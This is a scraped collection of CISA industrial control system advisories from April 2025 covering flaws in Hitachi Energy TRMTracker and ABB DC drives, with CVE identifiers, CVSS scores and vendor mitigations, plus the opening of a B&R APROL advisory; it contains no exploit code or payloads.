Hitachi Energy TRMTracker

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 6.9
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Hitachi Energy
Equipment: TRMTracker
Vulnerabilities: Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’), Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’), Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to execute limited remote commands, poison web-cache, or disclose and modify sensitive information.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following products are affected:

TRMTracker: Versions 6.2.04 and prior
TRMTracker: Versions 6.3.0 and 6.3.01

3.2 VULNERABILITY OVERVIEW
3.2.1 Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’) CWE-90
The TRMTracker web application is vulnerable to LDAP injection attack potentially allowing an attacker to inject code into a query and execute remote commands that can read and update data on the website.
CVE-2025-27631 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-27631. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N).
3.2.2 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) CWE-74
A Host Header Injection vulnerability in TRMTracker application may allow an attacker to modify the host header value in an HTTP request to leverage multiple attack vectors, including defacing the site content through web-cache poisoning
CVE-2025-27632 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-27632. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N).
3.2.3 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) CWE-79
The TRMTracker web application is vulnerable to reflected cross-site scripting attack. The application allows clientside code injection that might be used to compromise the confidentiality and integrity of the system.
CVE-2025-27633 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-27633. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Energy
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER
Eskom Holdings SOC Ltd, South Africa reported these vulnerabilities to Hitachi Energy.
4. MITIGATIONS
Hitachi Energy recommends users update to the following versions:

TRMTracker Versions 6.2.04 and below: Update to v6.2.04.014 or v6.3.02
TRMTracker Versions 6.3.0 and 6.3.01: Update to v6.3.02
Apply general mitigation factors

For more information, see the associated Hitachi Energy PSIRT security advisory 8DBD000210 Cybersecurity Advisory – Multiple Vulnerabilities in Hitachi Energy TRMTracker product.
Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY

April 3, 2025: Initial Republication of Hitachi Energy 8DBD000210 

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 6.9
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Hitachi Energy
  • Equipment: TRMTracker
  • Vulnerabilities: Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’), Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’), Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to execute limited remote commands, poison web-cache, or disclose and modify sensitive information.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following products are affected:

  • TRMTracker: Versions 6.2.04 and prior
  • TRMTracker: Versions 6.3.0 and 6.3.01

3.2 VULNERABILITY OVERVIEW

3.2.1 Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’) CWE-90

The TRMTracker web application is vulnerable to LDAP injection attack potentially allowing an attacker to inject code into a query and execute remote commands that can read and update data on the website.

CVE-2025-27631 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2025-27631. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N).

3.2.2 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) CWE-74

A Host Header Injection vulnerability in TRMTracker application may allow an attacker to modify the host header value in an HTTP request to leverage multiple attack vectors, including defacing the site content through web-cache poisoning

CVE-2025-27632 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2025-27632. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N).

3.2.3 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) CWE-79

The TRMTracker web application is vulnerable to reflected cross-site scripting attack. The application allows clientside code injection that might be used to compromise the confidentiality and integrity of the system.

CVE-2025-27633 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2025-27633. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Energy
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER

Eskom Holdings SOC Ltd, South Africa reported these vulnerabilities to Hitachi Energy.

4. MITIGATIONS

Hitachi Energy recommends users update to the following versions:

  • TRMTracker Versions 6.2.04 and below: Update to v6.2.04.014 or v6.3.02
  • TRMTracker Versions 6.3.0 and 6.3.01: Update to v6.3.02
  • Apply general mitigation factors

For more information, see the associated Hitachi Energy PSIRT security advisory 8DBD000210 Cybersecurity Advisory – Multiple Vulnerabilities in Hitachi Energy TRMTracker product.

Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • April 3, 2025: Initial Republication of Hitachi Energy 8DBD000210

 Read More

ABB Low Voltage DC Drives and Power Controllers CODESYS RTS

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v3 8.8
ATTENTION: Exploitable remotely/low attack complexity
Vendor: ABB
Equipment: DCT880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3), DCT880 memory unit incl. Power Optimizer, DCS880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3), DCS880 memory unit incl. DEMag, DCS880 memory unit incl. DCC
Vulnerabilities: Improper Input Validation, Out-of-bounds Write, Improper Restriction of Operations within the Bounds of a Memory Buffer

2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow attackers to trigger a denial-of-service condition or execute arbitrary code over the fieldbus interfaces.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
ABB reports that the following low-voltage DC drive and power controller products contain a vulnerable version of the CODESYS Runtime:

DCT880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3): All versions
DCT880 memory unit incl. Power Optimizer: All versions
DCS880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3): All versions
DCS880 memory unit incl. DEMag: All versions
DCS880 memory unit incl. DCC: All versions

3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPER INPUT VALIDATION CWE-20
After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37559 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.2 IMPROPER INPUT VALIDATION CWE-20
After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37558 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.3 OUT-OF-BOUNDS WRITE CWE-787
After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted remote communication requests can cause the CmpAppBP component to overwrite a heap-based buffer which can lead to a denial-of-service condition
CVE-2023-37557 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.4 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37556 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.5 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37555 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.6 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37554 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.7 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37553 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.8 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37552 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.9 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37550 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.10 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37549 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.11 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37548 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.12 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37547 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.13 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37546 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.14 IMPROPER INPUT VALIDATION CWE-20
In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.
CVE-2023-37545 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
3.2.15 IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119
In multiple versions of CODESYS Control an improper restriction of operations within the bounds of a memory buffer allow a remote attacker with user privileges to gain full access of the device.
CVE-2022-4046 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER
ABB PSIRT reported these vulnerabilities to CISA.
4. MITIGATIONS
If the drive or power controller is in an exploitable configuration, ABB recommends immediately applying the mitigations described in the workarounds section of the ABB security advisory.
For more information, see ABB’s security advisory.
ABB strongly recommends the following (non-exhaustive) list of general cyber security practices for any installation of software-related products:

Isolate special purpose networks (e.g. for automation systems) and remote devices behind firewalls and separate them from any general-purpose network (e.g. office or home networks).
Install physical controls so no unauthorized personnel can access your devices, components, peripheral equipment, and networks.
Minimize network exposure for all applications and endpoints to ensure that they are not accessible from the Internet unless they are designed for such exposure and the intended use requires such.
Ensure all nodes are always up to date in terms of installed software, operating system, and firmware patches as well as anti-virus and firewall.
When remote access is required, use secure methods, such as virtual private networks (VPNs). Also, understand that VPNs are only as secure as the connected devices.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY

April 3, 2025: Initial Republication of ABB 9AKK108470A9494 

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v3 8.8
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: ABB
  • Equipment: DCT880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3), DCT880 memory unit incl. Power Optimizer, DCS880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3), DCS880 memory unit incl. DEMag, DCS880 memory unit incl. DCC
  • Vulnerabilities: Improper Input Validation, Out-of-bounds Write, Improper Restriction of Operations within the Bounds of a Memory Buffer

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow attackers to trigger a denial-of-service condition or execute arbitrary code over the fieldbus interfaces.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

ABB reports that the following low-voltage DC drive and power controller products contain a vulnerable version of the CODESYS Runtime:

  • DCT880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3): All versions
  • DCT880 memory unit incl. Power Optimizer: All versions
  • DCS880 memory unit incl. ABB Drive Application Builder license (IEC 61131-3): All versions
  • DCS880 memory unit incl. DEMag: All versions
  • DCS880 memory unit incl. DCC: All versions

3.2 VULNERABILITY OVERVIEW

3.2.1 IMPROPER INPUT VALIDATION CWE-20

After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37559 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.2 IMPROPER INPUT VALIDATION CWE-20

After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37558 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.3 OUT-OF-BOUNDS WRITE CWE-787

After successful authentication as a user in multiple versions of multiple CODESYS products, specific crafted remote communication requests can cause the CmpAppBP component to overwrite a heap-based buffer which can lead to a denial-of-service condition

CVE-2023-37557 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.4 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37556 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.5 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37555 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.6 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37554 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.7 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37553 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.8 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37552 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.9 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37550 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.10 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37549 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.11 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37548 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.12 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37547 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.13 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37546 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.14 IMPROPER INPUT VALIDATION CWE-20

In multiple versions of multiple CODESYS products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2023-37545 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

3.2.15 IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119

In multiple versions of CODESYS Control an improper restriction of operations within the bounds of a memory buffer allow a remote attacker with user privileges to gain full access of the device.

CVE-2022-4046 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER

ABB PSIRT reported these vulnerabilities to CISA.

4. MITIGATIONS

If the drive or power controller is in an exploitable configuration, ABB recommends immediately applying the mitigations described in the workarounds section of the ABB security advisory.

For more information, see ABB’s security advisory.

ABB strongly recommends the following (non-exhaustive) list of general cyber security practices for any installation of software-related products:

  • Isolate special purpose networks (e.g. for automation systems) and remote devices behind firewalls and separate them from any general-purpose network (e.g. office or home networks).
  • Install physical controls so no unauthorized personnel can access your devices, components, peripheral equipment, and networks.
  • Minimize network exposure for all applications and endpoints to ensure that they are not accessible from the Internet unless they are designed for such exposure and the intended use requires such.
  • Ensure all nodes are always up to date in terms of installed software, operating system, and firmware patches as well as anti-virus and firewall.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs). Also, understand that VPNs are only as secure as the connected devices.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • April 3, 2025: Initial Republication of ABB 9AKK108470A9494

 Read More

CISA Releases Five Industrial Control Systems Advisories

 ​CISA released five Industrial Control Systems (ICS) advisories on April 3, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

ICSA-25-093-01 Hitachi Energy RTU500 Series
ICSA-25-093-02 Hitachi Energy TRMTracker
ICSA-25-093-03 ABB ACS880 Drives Containing CODESYS RTS
ICSA-25-093-04 ABB Low Voltage DC Drives and Power Controllers CODESYS RTS
ICSA-25-093-05 B&R APROL

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations. 

CISA released five Industrial Control Systems (ICS) advisories on April 3, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

 Read More

B&R APROL

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 9.2
ATTENTION: Exploitable remotely/low attack complexity
Vendor: B&R
Equipment: APROL
Vulnerabilities: Inclusion of Functionality from Untrusted Control Sphere, Incomplete Filtering of Special Elements, Improper Control of Generation of Code (‘Code Injection’), Improper Handling of Insufficient Permissions or Privileges , Allocation of Resources Without Limits or Throttling, Missing Authentication for Critical Function, Exposure of Sensitive System Information to an Unauthorized Control Sphere, Exposure of Data Element to Wrong Session, Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), External Control of File Name or Path, Incorrect Permission Assignment for Critical Resource

2. RISK EVALUATION
